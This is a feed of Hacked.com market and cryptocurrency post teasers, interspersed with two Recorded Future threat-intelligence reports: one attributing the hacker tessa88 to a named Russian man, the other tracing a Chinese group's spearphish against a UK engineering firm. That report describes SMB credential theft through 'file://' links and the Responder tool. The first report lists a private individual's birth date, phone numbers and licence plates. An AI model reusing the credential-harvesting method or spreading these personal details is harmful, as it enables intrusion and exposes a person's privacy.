The post Crypto Update: Ripple Due for a Correction appeared first on Hacked: Hacking Finance.

Pre-Market Analysis And Chartbook: Fed-Optimism Sparks Bounce in Risk Assets as Dollar Falls

Wednesday Market Snapshot Asset Current Value Daily Change S&P 500 2,656 0.73% DAX 30 11,222 1.39% WTI Crude Oil 54.72 2.49% GOLD 1,227 0.42% Bitcoin 4,456 2.39% EUR/USD 1.1402 0.29% Yesterday, risk assets had an ugly Wall Street session, with a lot of stocks hitting new multi-month or even multi-year lows, as bulls were running […]

The post Pre-Market Analysis And Chartbook: Fed-Optimism Sparks Bounce in Risk Assets as Dollar Falls appeared first on Hacked: Hacking Finance.

Zcash Price Analysis: ZEC/USD Flood Gates Open After Breakout and Retest from Pennant

ZEC/USD licking its wounds with deep double-digit losses as the market continues to take a beating. Next major areas of support are eyed at currently levels around $89.50 and then $75. Zcash has been under chunky selling pressure, no thanks to the larger weakness seen across the broader crypto market. The ZEC/USD exchange rate is […]

The post Zcash Price Analysis: ZEC/USD Flood Gates Open After Breakout and Retest from Pennant appeared first on Hacked: Hacking Finance.

Bank Sector Likely to Show Steadiness as 2020 Presidential Election Cycle Looms

About a month ago, we analyzed the financial sector where individual banks were considered for investment. This time, we are back to this sector again, since in the current conditions it cannot be ignored. This time, however, we are going to analyze ETFs that include financial sector papers. When analyzing the S&P 500, there are […]

The post Bank Sector Likely to Show Steadiness as 2020 Presidential Election Cycle Looms appeared first on Hacked: Hacking Finance.

True Identity of Notorious Hacker tessa88 Revealed

Insikt Group

Scope Note: To create the following actor profile, Insikt Group used OSINT, Recorded Future data, and dark web analysis to identify the contact information, alternative aliases, and TTPs used by the actor tessa88.

This profile will be of most interest to email service providers, social media, and technological companies located primarily in the United States and Russia.

Executive Summary

In early 2016, a previously unknown hacker operating under the alias of tessa88 publicly emerged after offering an extensive list of compromised, high-profile databases for sale. The hacker offered for sale the databases of companies such as VKontakte, Mobango, Myspace, Badoo, QIP, Dropbox, Rambler, LinkedIn, and Twitter, among others. Within several months of incredibly active public engagement, the hacker’s personas were banned from almost every dark web community for various reasons, and by May of 2016, tessa88 entirely ceased all communications with the media and public alike. In the following months, numerous attempts were made to uncover the true identity of the hacker. However, no concrete evidence was ever produced that linked tessa88 with any real individual.

New findings strongly suggest that the individual behind tessa88 may be Maksim Donakov of Penza, Russia, who operated under multiple different monikers on the dark web. It is possible that a second unknown individual was assisting Donakov in maintaining the tessa88 account, adhering to impeccable OPSEC procedures and until this day remaining anonymous. In either scenario, we firmly believe that Donakov Maksim has directly benefited from the sales of compromised databases and should be viewed as the main actor.

Key Judgments

  • tessa88’s criminal career likely began as early as 2012, before the breaches of LinkedIn, Dropbox, Yahoo, and others that were accredited to them. They likely created the alias tessa88 specifically to sell high-profile databases.
  • Our analysis, based on discovered images of the real individual hiding behind the moniker tessa88 and underground forum discussions, allows us to assess with a high degree of confidence that tessa88 is a man and not a woman.
  • Our analysis reveals that the moniker tessa88 is tied to aliases Paranoy777, Daykalif, and tarakan72511. All share similar social media photos that are nearly identical to a passport photo of Maksim Donakov, who is the individual behind Paranoy777.
  • Our research suggests that Donakov, Maksim Vladimirovich (Донаков, Максим Владимирович), is a resident of the Russian Federation.

Tessa88 True Identity

Uncovering tessa88’s true identity.

Background

The threat actor tessa88, also known as stervasgoa and jannet93, is a famous hacker who was involved in the sale of multiple high-profile databases, including LinkedIn, VKontakte, Facebook, MySpace, and Twitter, from February to May of 2016. It is believed by some in the media that the actor is a Russian-speaking female. tessa88 was active for only a short time, during which they sold databases from websites including LinkedIn, VKontakte, Yahoo, Yandex, Rambler, MySpace, Badoo, QIP, and Mobango. tessa88 was eventually banned on multiple forums due to accusations of fraudulent activities from other members.

Recorded Future data shows that the actor Peace_of_Mind, also known as Peace, was selling a LinkedIn database as early as May 16, 2016 on the currently defunct TheRealDeal Market. The LinkedIn breach resulted in the arrest of Russian national Yevgeniy Nikulin (Евгений Никулин) by the FBI in October 2016. Nikulin was in the Czech Republic at the time and was later extradited to the United States. The Russian government claimed that the actions of the U.S. were politically motivated, and in an effort to fight Nikulin’s extradition, issued a warrant for his arrest in November 2016, alleging the individual had stolen $3,450 in WebMoney. At the time of this report, the investigation is still pending, and no clear evidence has been produced linking Nikulin to Peace_of_Mind.

Motherboard published their findings from an interview they had with tessa88, who claimed to be a veteran member of the criminal underground and accused Peace_of_Mind of stealing the databases that tessa88 was selling. Peace_of_Mind, in return, claimed that tessa88 stole the databases from a friend to sell online.

A report from the cybersecurity firm InfoArmor claims that tessa88 acted as a proxy who sold accounts and personally identifiable information (PII) stolen by a group of hackers identified as “Group E.” InfoArmor claims that tessa88 was the first to sell accounts from many of these high-profile databases beginning as far back as February 2016, which Recorded Future data confirmed.1 Around May 2016, InfoArmor claimed that tessa88 and Peace_of_Mind made an agreement to share at least some of their respective databases between one another in a likely attempt to expedite monetizing the massive amount of data between the two actors. The relationship between tessa88 and Peace_of_Mind deteriorated as other members of the underground communities claimed the data was of poor quality. If this report is accurate, this corroborates Motherboard’s findings and explains the outspoken hostility between the two actors.

Recorded Future Timeline

Activity of tessa88 (also known as stervasgoa) on the dark web between February and May 2016.

Threat Analysis

An analysis of dark web activity connected tessa88 to multiple chat and email accounts, including the Jabber accounts tessa88@exploit[.]im, tessa88@xmpp[.]jp, mrfreeman777@xmpp[.]jp, darksideglobal@exploit[.]im, the ICQ account 740455, and the email address firetessa@yahoo[.]com.

Tessa88 Selling Databases

tessa88 selling databases from websites including LinkedIn and MySpace on an underground forum that is currently defunct.

The tessa88@exploit[.]im Jabber account used by tessa88 in sales threads on underground forums led to the Twitter account @firetessa, which on July 5, 2016, tweeted out that the Jabber account tessa88@exploit[.]im was theirs.

Twitter Claim

The tweet from the Twitter account @firetessa claiming tessa88@exploit[.]im to be theirs.

The actor TraX, a member of the underground community, stated that tessa88 is a man and posted an alleged photo of the actor on an underground forum. TraX also stated that tessa88 was behind recent mega breaches like LinkedIn, MySpace, and Yahoo, and even expressed a willingness to share this information with reporters.

Tessa88 Alleged Photo

An alleged photo of tessa88 posted by TraX on an underground forum.

OSINT then identified the Imgur account tarakan72511, who posted screenshots of discussions regarding the Yahoo and Equifax breaches with the actors HelloWorld and Ibm33a14. Note that Ibm33a14 is a Russian-speaking actor who claimed to have the original Yahoo and Equifax database dumps in 2017 on several cybercriminal forums.

Discussion Screenshot

A screenshot of a discussion regarding the Yahoo and Equifax posted by tarakan72511.

That same Imgur account also posted a picture titled “tessa88” in 2017, showing a man whose body type and hairstyle are similar to the individual depicted in the aforementioned picture posted by TraX.

Tessa88 Potential Picture

A potential picture of tessa88 posted by tarakan72511 on Imgur.

The moniker tarakan72511 is an alias used by the actor Paranoy777, who uses the Jabber account tarakan72511@chatme[.]im. Paranoy777, like tessa88, both were sellers of stolen databases from large social media and technology companies from February to May 2016.

Recorded Future identified a complaint filed against tarakan72511 in which another member claimed that Daykalif is a Russian-speaking scammer who was trading large databases and used the Jabber accounts daykalif@xmpp[.]jp and tarakan72511@chatme[.]im — the same Jabber account used by the actor Paranoy777, who, in turn, is connected to tarakan72511. If this claim is true, then it is likely that the users Paranoy777 and Daykalif are the same person.

Criminal Forum Complaint

A complaint found on a criminal forum claiming that Daykalif used the Jabber accounts daykalif@xmpp[.]jp and tarakan72511@chatme[.]im.

More information provided by Imgur account tarakan72511 revealed that the user is apparently an avid dog lover. OSINT identified a YouTube account with a similar username — Tarakan72511 Donakov — who posted a video showing someone feeding stray dogs. During the video, a voice was heard stating that they are in Penza, Russia. The vehicle in the video is Mitsubishi Lancer with the registration number K652BO 58.

YouTube Profile

Tarakan72511 Donakov’s YouTube profile.

Moreover, at 56 seconds in the video, a Guy Fawkes mask is seen. A similar mask was used as the avatar on Tarakan72511 Donakov’s YouTube profile and is also worn by the person on the image shared by TraX.

Guy Fawkes Mask

The Guy Fawkes mask seen in the YouTube video, YouTube avatar, and in TraX’s image.

OSINT gathered on Donakov (Донаков) from Penza (Пенза) revealed that someone named Донаков М.В./Donakov M.V. committed several crimes in the Russian cities of Yaroslavl and Penza, including a motor vehicle accident that happened while driving a Mitsubishi Lancer in 2017. An individual named Donakov, Maksim Vladimirovich (Донаков, Максим Владимирович), originally from Yaroslavl and later having moved to Penza, was also mentioned in multiple articles from SudAct, stating that the individual had spent several years in prison prior to the accident.2

Pivoting from these records, the research identified three Odnoklassniki profiles, all with the name Maxim Donakov — two of which listed their current location as Yaroslavl, and one as Penza. The first Odnoklassniki profile belongs to a man who was residing in Yaroslavl and was born on July 2, 1989. The user last visited the site on September 9, 2013. The second Odnoklassniki profile has the same name and date of birth as the previous profile. Both the profile picture and other images depict the same individual seen in the Imgur image from tarakan72511. Note the Mitsubishi Lancer with the license plate А 134МК 76.

Odnoklassniki Profile

Images from the Odnoklassniki profile of Maxim Donakov.

The analysis of the second Odnoklassniki profile revealed that the actor is linked to another user, “Ядовитый Таракан” (Yadovitiy Tarakan), allegedly residing in Pervomaysk, Ukraine. Yadovitiy Tarakan’s name is synonymous with the Imgur account tarakan72511, and the profile photo of the person strongly resembles Donakov Maxim. It is worth mentioning that Pervomaysk is Maxim Donakov’s real place of birth. Considering the facts mentioned above, we assess with a high degree of confidence that Yadovitiy Tarakan’s profile also belongs to Donakov Maxim.

Odnoklassniki Profile

Another Odnoklassniki profile with the username “Ядовитый Таракан” created by Maxim Donakov.

Furthermore, confidential sources confirmed that Maxim (Maksim) Donakov is a real person born on July 2, 1989. According to SudAct, Donakov was released under police supervision but was then imprisoned after committing another crime in 2014. This may explain the existence of multiple Odnoklassniki profiles, as Donakov may have been forced to create a new profile after his release from prison if he forgot the login credentials for his previous account(s).

OSINT identified other accounts and contact information likely related to Donakov (tessa88), such as a VKontakte profile for Maxim Ivanov with the phone number +79022222229, profiles on Vkrugudruzei and Valet.ru, and the YouTube account Maxim Donakov with the phone number +17789981919. An open web search for “Максим Донаков” revealed the profile Gulik01 on Freelance.ru, which possibly belongs to tessa88 (Donakov). The account information for Gulik01 states that he is a Russian-speaking information technology freelancer.

Moreover, additional searches in leaked databases identified Maksim Donakov, a resident of Penza born on July 2, 1989, matching the user profile information from the aforementioned Odnoklassniki profiles and the image titled “tessa88” posted by the Imgur user tarakan72511, which depicts the same person. Again, all of this indicates that tessa88 is indeed Maksim Donakov.

Bitcoin Wallet Analysis

The analysis of tessa88’s confirmed Bitcoin wallet, with the majority of funds being laundered through LocalBitcoins.

Insikt Group’s analysis of transactions associated with the confirmed tessa88 Bitcoin wallet using Crystal Blockchain revealed that the hacker received at least 168 Bitcoins, or approximately $90,000, and most of the funds were eventually laundered through LocalBitcoins, a popular peer-to-peer exchange service. Despite the actor’s disappearance in May of 2016, he continued using his Bitcoin wallet until August 2017.

Outlook

Insikt Group assesses with a high degree of confidence that tessa88 is one of many monikers created by Maksim Donakov to sell high-profile databases on underground criminal forums. Furthermore, it is likely that Donakov was active on the dark web since at least 2012 and also used the monikers Paranoy777, Daykalif, and tarakan72511.

Maxim Donakov

Maxim Donakov, also known as tessa88, Paranoy777, and Daykalif.

Maksim Donakov, whose full name is Maksim Vladimirovich Donakov (Максим Владимирович Донаков), was born on July 2, 1989. Donakov is a resident of the Russian Federation who previously lived in Yaroslavl and later moved to Penza. Analysis of social media accounts and other sources from Recorded Future further confirm our findings.

According to the conducted analysis, the monikers tessa88, Paranoy777, and Daykalif were created intentionally to sell compromised data on the dark web. Considering the contradictory information regarding the breaches of the aforementioned companies, it is difficult to identify real tactics, techniques, and procedures (TTPs) applied by the hackers. However, the pending investigation of Yevgeniy Nikulin’s case, tied with the LinkedIn data leak, may shed light on this story and fill the remaining gaps.

1Recorded Future observed tessa88 selling PII from high-profile databases on a Russian hacking forum as early as February 2, 2016.

2SudAct (sudact.ru) is the largest non-governmental Russian website of judicial records.

The post True Identity of Notorious Hacker tessa88 Revealed appeared first on Recorded Future.

     

Pre-Market Analysis And Chartbook: Risk-Off Trade Still On as Stocks Plunge Globally

Tuesday Market Snapshot Asset Current Value Daily Change S&P 500 2,640 -2.17% DAX 30 11,054 -1.68% WTI Crude Oil 54.04 -4.81% GOLD 1,223 -0.15% Bitcoin 4,604 -2.75% EUR/USD 1.1392 -0.52% The broad risk-off shift that we have been following in recent months continues to be the dominant force in global financial markets, and today, global […]

The post Pre-Market Analysis And Chartbook: Risk-Off Trade Still On as Stocks Plunge Globally appeared first on Hacked: Hacking Finance.

Bitcoin Cash Price Analysis: BCH/USD Hard Flops as Price Moves Within the Abyss

  Bitcoin Cash price falls into uncharted territory, struggling to find a bottom. Weekly chart still points to further downside, RSI not within oversold territory as of yet. The Bitcoin Cash price remains heavily on the back foot, the standout under-performer across the major altcoins. BCH/USD is currently running at three consecutive sessions of losses. […]

The post Bitcoin Cash Price Analysis: BCH/USD Hard Flops as Price Moves Within the Abyss appeared first on Hacked: Hacking Finance.

Forex Analysis And Chartbook: Tech Selloff Resumes, Dollar Dips Again, as Yields Hit 2-Month Low

Monday Market Snapshot Asset Current Value Daily Change S&P 500 2,697 -1.62% DAX 30 11,244 -0.85% WTI Crude Oil 56.76 -0.12% GOLD 1,224 0.21% Bitcoin 4,989 -10.26% EUR/USD 1.1452 0.32% While all eyes were on the cryptocurrency segment today, as the major coins continue to fall sharply, traditional financial markets have also been very active […]

The post Forex Analysis And Chartbook: Tech Selloff Resumes, Dollar Dips Again, as Yields Hit 2-Month Low appeared first on Hacked: Hacking Finance.

Litecoin Price Analysis: One Last Safety Net Ahead of $20 Territory

  Litecoin has been further slammed, dropping 35% over the past two weeks of trading. Should near-term demand area of $35-33 fail to hold, it will be very punishing. The Litecoin price remains firmly on the back foot, one of the standout under-performers in this current bear market, against some of the other major altcoins. […]

The post Litecoin Price Analysis: One Last Safety Net Ahead of $20 Territory appeared first on Hacked: Hacking Finance.

Crypto Update: New Bear Market Lows Across the Board

The key long-term breakdown in the cryptocurrency segment that we observed last week continued in earnest today, with most of the majors hitting new bear market lows amid another wave of heavy selling. Bitcoin dropped below $5200 for the first time since last October, Ethereum violated the key $160 level, Litecoin plunged below $38, with […]

The post Crypto Update: New Bear Market Lows Across the Board appeared first on Hacked: Hacking Finance.

Oil Prices Rise Amid U.S. Dollar Correction

By Dmitriy Gurkovskiy, Chief Analyst at RoboForex After being sold for about a month and a half, the oil price is being slightly corrected. It’s still too early to say that it has completely recovered, but little by little investors are starting to pick up the oversold asset. On one hand, these long positions, apart […]

The post Oil Prices Rise Amid U.S. Dollar Correction appeared first on Hacked: Hacking Finance.

Crypto Update: 5 Altcoins to Watch This Week

Last week’s crypto carnage has driven many altcoins below their yearly lows. However, there are some coins that managed to hold their ground. Even amidst massive selloffs, these coins are surviving the storm. Thus, they deserve your attention. In this article, we reveal the 5 altcoins to watch this week. Ripple/Bitcoin (XRP/BTC) While the rest […]

The post Crypto Update: 5 Altcoins to Watch This Week appeared first on Hacked: Hacking Finance.

Tron Price Analysis: TRX/USD Forced to Seek Help from Major Demand Area Despite New Developments

TRX/USD under heavy downside pressure, dropping double digits. That is 13 consecutive sessions of losses. The price is within a known chunky buying area and a failure to attract the bulls could be catastrophic. TRX/USD took a heavy beating on Monday, down as much as 12% in early part of the session. This downside pressure […]

The post Tron Price Analysis: TRX/USD Forced to Seek Help from Major Demand Area Despite New Developments appeared first on Hacked: Hacking Finance.

5 Things To Watch Next Week + ChartBook

Brexit Saga Nearing It’s End? GBP/USD, 4-Hour Chart Analysis The Great British Pound had its most volatile week since the Brexit referendum, with still the same issue causing turmoil years after the initial shocking decision. For now, nothing is certain about the outcome of the saga, even with several deadlines quickly approaching. After the exodus […]

The post 5 Things To Watch Next Week + ChartBook appeared first on Hacked: Hacking Finance.

Stellar Price Analysis: XLM/USD Pullback Means Bulls Can Run Free

  XLM/USD has seen the required retest of the broken pennant pattern, leaving the door open to greater upside. Technically the price developments appear to be stacked in the favor of the bulls. Recent Price Developments Stella’s XLM is on its way back up to the north. XLM/USD is running at two consecutive sessions in the […]

The post Stellar Price Analysis: XLM/USD Pullback Means Bulls Can Run Free appeared first on Hacked: Hacking Finance.

Ethereum Price Analysis: ETH/USD Has Big Opportunity to Fly Again

  ETH/USD is running at seven consecutive sessions of losses, dropping as much as 25%. Price action is moving within a strong demand area, which could very well see the price rocketing again. Current Price Action ETH/USD is stuck within a stubborn downward trend. The price is running at a seven consecutive session losing streak. […]

The post Ethereum Price Analysis: ETH/USD Has Big Opportunity to Fly Again appeared first on Hacked: Hacking Finance.

Bitcoin Update: Bull and Bear Scenarios

To say that the last two days in crypto have been a bloodbath would be an understatement. Many altcoins have broken critical support areas. Some cryptos even registered new yearly lows. One of those is Bitcoin (BTC/USD). Bitcoin dropped to as low as $5,188 on Coinbase and lost as much as 20% of its value […]

The post Bitcoin Update: Bull and Bear Scenarios appeared first on Hacked: Hacking Finance.

Pre-Market Analysis And Chartbook: Dollar Dips on Dovish Powell as Brexit Deal Still in Question

Friday Market Snapshot Asset Current Value Daily Change S&P 500 2,711 -0.83% DAX 30 11,265 -0.78% WTI Crude Oil 57.59 1.80% GOLD 1,221 0.66% Bitcoin 5,555 -0.53% EUR/USD 1.1380 0.50% Today is shaping up to be another wild ride in financial markets after the recent volatile sessions, with currencies, bonds, and equities all experiencing heavy […]

The post Pre-Market Analysis And Chartbook: Dollar Dips on Dovish Powell as Brexit Deal Still in Question appeared first on Hacked: Hacking Finance.

Crypto Update: Coins Consolidate After Key Breakdown

The cryptocurrency segment is still under the influence of this week’s key technical breakdown that carried several majors below crucial support levels. Bitcoin’s moves have been dominating the market in recent days, and as the most valuable coin formed a short-term bottom, the top coins entered a choppy consolidation phase, retracing some of their steep […]

The post Crypto Update: Coins Consolidate After Key Breakdown appeared first on Hacked: Hacking Finance.

Zcash Price Analysis: $100 Bargain Buying

  ZEC/USD is running at four consecutive daily sessions closing in the red. Chunky buying interest looks healthy within the $100 price region. ZEC/USD is currently stuck within a very stubborn bearish trend, as seen across the crypto market wide. Several key areas have been breached, however the ZEC/USD bulls are heavily defending vital support […]

The post Zcash Price Analysis: $100 Bargain Buying appeared first on Hacked: Hacking Finance.

Litecoin Price Analysis: LTC/USD Has Fallen Through Vital Support; Where Next?

  Critical support for LTC/USD was breached just under the $50 area, leaving the door open to further downside pressure. LTC/USD is moving within a range/consolidation block, subject to another explosive move. LTC/USD has remained firmly within a downside trend, showing no signs of that shifting anytime soon. Out of the last ten sessions, LTC/USD […]

The post Litecoin Price Analysis: LTC/USD Has Fallen Through Vital Support; Where Next? appeared first on Hacked: Hacking Finance.

TRON Price Analysis: TRX/USD Moves Within Proven Buying Area

  TRX/USD flirting with a huge buying area, historically proven to see buyers swoop in. Justin Sun sings praises on 100 million $TRX trading volume for Tron DEX. TRX/USD has been suffering heavily, in line with a large bearish reversal seen across the board. The price is running sharply lower, closing on the daily in […]

The post TRON Price Analysis: TRX/USD Moves Within Proven Buying Area appeared first on Hacked: Hacking Finance.

Pre-Market Analysis And Chartbook: Brexit Chaos Sparks Turmoil Across Markets

Thursday Market Snapshot Asset Current Value Daily Change S&P 500 2,685 -0.63% DAX 30 11,360 -0.47% WTI Crude Oil 56.40 0.71% GOLD 1,215 0.31% Bitcoin 5,389 -3.72% EUR/USD 1.1302 -0.04% The Brexit process continues to be the main driver in financial markets across asset classes, and the situation in the UK could be best described […]

The post Pre-Market Analysis And Chartbook: Brexit Chaos Sparks Turmoil Across Markets appeared first on Hacked: Hacking Finance.

Long-Term Cryptocurrency Analysis: Bear Market Continues With Major Technical Breakdown

After months of choppy consolidation, yesterday, we saw the largest move in the cryptocurrency segment since April, which took the majors below key technical levels. Bitcoin’s drop is the most important event, since the most valuable coin violated a structurally important base support for the first time since its historic bull run to $20,000 started. […]

The post Long-Term Cryptocurrency Analysis: Bear Market Continues With Major Technical Breakdown appeared first on Hacked: Hacking Finance.

Chinese Threat Actor TEMP.Periscope Targets UK-Based Engineering Company Using Russian APT Techniques

Insikt Group

Click here to download the complete analysis as a PDF.

Scope Note: Recorded Future’s Insikt Group analyzed network indicators of compromise and TTPs relating to an intrusion incident targeting a U.K.-based engineering company. Sources include Recorded Future’s product, VirusTotal, ReversingLabs, DomainTools Iris, and PassiveTotal, along with third-party metadata and common OSINT techniques.

This report will be of greatest interest to organizations within the high-tech engineering industries in the U.S., Europe, and Japan, as well as those investigating Chinese state-sponsored cyberespionage.

Executive Summary

Employees of a U.K.-based engineering company were among the targeted victims of a spearphishing campaign in early July 2018. The campaign also targeted an email address possibly belonging to a freelance journalist based in Cambodia who covers Cambodian politics, human rights, and Chinese development. We believe both attacks used the same infrastructure as a reported campaign by Chinese threat actor TEMP.Periscope (also known as Leviathan), which targeted Cambodian entities in the run-up to their July 2018 elections. Crucially, TEMP.Periscope’s interest in the U.K. engineering company they targeted dates back to attempted intrusions in May 2017.

Based on the available data and evidence outlined in this report, Recorded Future assesses with medium confidence that Chinese threat actor TEMP.Periscope reused publicly reported, sophisticated TTPs from Russian threat groups Dragonfly and APT28 to target the U.K. engineering company, likely to gain access to sensitive and proprietary technologies and data. We believe TEMP.Periscope reused published TTPs either to increase the group’s chances of success in gaining access to the victim network or to evade attribution by laying false flags to confuse researchers.

Recorded Future Timeline of TTP Activity

Timeline of selected APT28, Dragonfly, and TEMP.Periscope TTP disclosures and activity.

Key Judgments

Background

TEMP.Periscope is a state-sponsored Chinese threat actor that first came to public prominence in October 2017, when reports surfaced about a group called Leviathan. Leviathan used a combination of unique and open source tooling to target the maritime and defense industries for espionage purposes. The report detailed coverage of the group dating back to at least 2014.

Reporting emerged months later highlighting further activity against the maritime and defense sectors that mainly targeted companies in the U.S. and Europe and included more details on the group’s TTPs. The activity was tagged with a new threat actor name, TEMP.Periscope, but the report authors noted that Leviathan and TEMP.Periscope were the same group.

The increased targeting of high-tech marine engineering entities coincided with the growing regional tensions surrounding China’s claims for much of the South China Sea (SCS) territory. Chinese cyberespionage targeting countries neighboring the South China Sea continued to escalate in 2018, with reports of TEMP.Periscope targeting Cambodia ahead of their July 2018 elections. Additionally, attacks such as the one uncovered against a U.S. Navy contractor in early 2018, resulting in the theft of a massive amount of highly sensitive data that included plans to develop a submarine-based, supersonic anti-ship missile, demonstrate China’s continued targeting of cutting-edge naval technology to bridge the technological gap with the U.S.

Threat Analysis

The Infection Vector

The attempted intrusion we studied targeted the network of a U.K. company that provides specialist engineering solutions. The U.K. engineering company shared details of the attempted spearphish with Recorded Future, and the following IOCs served as a starting point for our investigation.

IOCs

Email headers revealed that the spearphish was sent on July 6, 2018 at 9:30 AM UTC, via Foxmail. Foxmail is a freeware email client developed by Tencent, one of the three largest internet services companies in China. Foxmail boasts over three million daily users in China and has previously been associated with Chinese APT activity.

In addition to email addresses belonging to the U.K. engineering company’s employees, the same spearphish was also sent to an email address possibly belonging to a journalist based in Cambodia. The sender account, melissa.coade[at]yahoo[.]com, was spoofing Australian journalist and lawyer Melissa Coade, who among other things writes about Cambodian civil and social matters and has written for the Phnom Penh Post.

In a spearphishing campaign targeting the Cambodian elections in July 2018, Chinese threat actor TEMP.Periscope spoofed the sender address and impersonated a worker from a Cambodian nongovernmental organization (NGO).

Spearphish Email

Snippet of a spearphish email shared by the targeted U.K. engineering company.

The email contained two malicious links. The first, a “file://” link, if clicked, would generate an SMB session. The second link was to a .url file that was also configured to create an outbound SMB connection.

The threat actor masqueraded as a Cambodian reporter requesting further information from the victim to be uploaded to her “report website.” However, spelling and punctuation errors in the message alerted network defenders at the victim organization.

Our analysis of the metadata contained within the email header and a subsequent controlled interaction with the file share over SMB revealed several interesting characteristics of the attempted intrusion.

Responder: The “NetBIOS Poisoner”

First, we analyzed the SMB file path link. We observed the hostname WIN-PRH492RQAFV on C2 82.118.242[.]243 when it attempted to acquire SMB credentials from the victim network. We then noted the hostname WIN-PRH492RQAFV was hardcoded within several forked versions of a Python hacktool called Responder on GitHub. One version of Responder with this hostname was found in a build of P4wnP11 that was uploaded to BeeBin, a free file upload service, and another version with the same hostname was found within PiBunny.

GitHub String

WIN-PRH492RQAFV string present within a modified version of Responder on GitHub.

Responder was released in January 2014. It is described as follows in its README file listed on the official GitHub repository: “Responder is an LLMNR, NBT-NS, and MDNS poisoner. It will answer to specific NBT-NS (NetBIOS Name Service) queries based on their name suffix (see: http://support.microsoft.com/kb/163409). By default, the tool will only answer to File Server Service request, which is for SMB. The concept behind this is to target our answers, and be stealthier on the network …”

Malicious use of Responder was first publicly documented on August 11, 2017 as being used by APT28, also known as Fancy Bear. The tool was used against hotel visitors to spoof NetBios resources. Victims were coerced into connecting to UDP port 137 and disclosing credentials over SMB to APT28, which the threat actor then used to gain elevated access to the network.

More Lessons From Russia: SMB Credential Harvesting Using “file://” Path

Building on the use of Responder, the threat actor also appeared to borrow techniques originating from a different Russian threat actor, Dragonfly, also known as Energetic Bear or Crouching Yeti.

The path “file://82.118.242[.]243/[REDACTED]” used in the spearphish was likely to steal SMB credentials by creating an invisible image tag that the host attempts to fetch over SMB, while giving the attackers a hashed value of the user’s NTLM password. When executing the code, the browser creates an invisible image tag and sets the URL to an attack server using the “file://” protocol scheme, which also transmits the user’s login NTLM hash. This created an effective watering hole to fingerprint potential victims and gather credentials for subsequent incursions into target networks.

This technique of leveraging the “file://” path to trigger an SMB connection was first publicly detailed by US-CERT on March 15, 2018 as a sophisticated technique used by Russian government actors believed to be the Dragonfly threat actor, targeting the energy industry and other critical infrastructure sectors.

SWC Hosted On 82.118.242[.]243?

Registration details for 82.118.242[.]243, the IP associated with the SMB credential theft detailed above, proved to be inconclusive. WHOIS referenced the IP within a massive range registered to the U.K. ISP Virgin Media (82.0.0.0 – 82.47.255.255). However, MaxMind resolved the IP to Bulgarian hosting provider Histate Global Corp.

Based on the listed vulnerabilities in Shodan and scan results for the machine, 82.118.242[.]242 is a web server likely running Windows Internet Information Services (IIS) 7.5. It has ports 22, 80, 88, 443, 445, 587, 902, and 5985 open.

Vulnerabilities

Vulnerabilities likely associated with 82.118.242[.]243.

Another IP address that falls within the same /24 CIDR range, 82.118.242[.]124, was flagged in Recorded Future with an abnormally high risk score of 89 in July 2018. This was due to the IP appearing in the IOC listing by Cisco Talos as second-stage malware associated with the VPNFilter botnet. This botnet has been attributed to APT28 by the U.S. Department of Justice.

Based on the vulnerability of the web server 82.118.242[.]243 and the use of the “file://” SMB credential stealing technique directing the victim to the IP, we believe the threat actor compromised the web server and used it as a targeted watering hole to illicitly acquire SMB credentials from victims during this campaign.

WIN-AB2I27TG6FK and Chinese Threat Actor TEMP.Periscope

Hostname WIN-AB2I27TG6FK was observed as the NetBios server name of the device sending the spearphish from the VPN IP 193.180.255[.]2.

Open source research for the hostname WIN-AB2I27TG6FK revealed an open directory (Google cached link) at the URL scsnewstoday[.]com/news/ that hosted several files containing the hostname in the filename (see snapshot of the domain below). The domain was previously reported as a C2 used by the Chinese threat actor TEMP.Periscope to deliver their AIRBREAK downloader. AIRBREAK, also known as Orz, is a JavaScript-based backdoor that retrieves commands from hidden strings in compromised webpages and actor-controlled profiles on legitimate services.

File Listing

File listing on an open directory hosted at http://scsnewstoday[.]com/news.

In addition to AIRBREAK, the scsnewstoday C2 server reportedly hosted other malware and logs relating to TEMP.Periscope malicious activity that targeted Cambodian entities in the run-up to the country’s elections. The spearphish against the U.K. engineering company occurred at the same time this campaign was active — in early July 2018. Judging from the naming convention employed on filenames in the open directory, C2S and S2C likely relate to client-to-server and server-to-client connections with the hostname WIN-AB2I27TG6FK, which we assess is likely to be the hostname associated with the scsnewstoday[.]com C2. We’d expect to see many more files listed if the hostnames in the filenames related to the clients, or victims, targeted by TEMP.Periscope.

The domain scsnewstoday[.]com was hosted on U.S. IP 68.65.123[.]230 and registered to domain hosting service Namecheap until July 11, 2018. Details of the C2 domain were published just a day earlier, which we believe may have unnerved TEMP.Periscope operators, resulting in it being dropped. Unfortunately, the open directory is no longer accessible, which hampered our ability to understand the precise nature of the three files containing the WIN-AB2I27TG6FK hostname.

According to industry reporting, Chinese espionage group TEMP.Periscope has conducted large-scale phishing, intrusion, remote access trojan (RAT), and data exfiltration activity since at least 2013. Targeting has primarily focused on maritime-related entities across multiple industries, including engineering, shipping and transportation, manufacturing, defense, government offices, and research universities. However, the group has also targeted professional and consulting services, high-tech industry, healthcare, and media and publishing.

Originating IP for Spearphish 193.180.255[.]2

This IP appeared in the email header information as the X-Forwarded-For IP, indicating that it was the originating IP address for the sender of the spearphish. WHOIS registration data revealed that 193.180.255[.]2 is registered to Privat Kommunikation Sverige AB, which is the full company name of PrivateVPN, a popular commercial VPN service. The company states that they support OpenVPN over TCP/UDP, L2TP, IPSEC, PPTP, and IKEv2 protocols.

Recorded Future identified three VPN connections involving the 193.180.255[.]2 IP between June 30 and July 1, 2018. All three connections were over UDP 500 (IKE/IKEv2), originating from Bangladesh IP 103.198.138[.]187.

Additionally, between July 3 and July 10, 2018, 193.180.255[.]2 established SSH (TCP 22), NetBios (TCP 139), and Microsoft SMB (TCP 445) connections to the malicious SMB credential harvesting C2 82.118.242[.]243. Interestingly, these connections took place during the seven-day window within which the spearphish was sent.

Historic Targeting of U.K. Engineering Company by TEMP.Periscope

Prior to this attempt in July, the same U.K. engineering company had previously been targeted in May 2017. This campaign used the ETERNALBLUE exploit and a unique DNS tunneler backdoor. The DNS tunneler used in the attack was configured to communicate with a subdomain of thyssenkrupp-marinesystems[.]org. The domain was clearly spoofing German defense contractor ThyssenKrupp Marine Systems, which specializes in marine engineering. In addition to hosting the spoofed domain, Netherlands-based HostSailor VPS IP 185.106.120[.]206 also hosted an open directory containing malware and tools for use by the threat actor, not dissimilar to the TEMP.Periscope scsnewstoday[.]com C2 and open directory set up.

